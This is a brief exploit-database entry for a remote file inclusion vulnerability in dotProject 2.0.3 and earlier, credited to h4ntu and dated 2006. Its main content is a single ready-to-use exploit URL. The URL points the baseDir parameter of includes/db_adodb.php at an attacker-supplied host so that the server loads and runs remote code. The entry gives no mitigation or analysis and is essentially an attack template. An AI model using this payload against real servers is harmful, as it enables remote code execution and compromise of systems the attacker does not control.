id: 534
date: 06/19/2006
title: dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability
author: h4ntu
cves: 

=================================================================
dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability
=================================================================



Credits : h4ntu

Title : dotProject <= 2.0.3 Remote File Inclusion

URL : http://www.dotproject.net/


Exploit : http://target.com/[dotProject_path]/includes/db_adodb.php?baseDir=[attacker] 



#  0day.today [2023-03-25]  #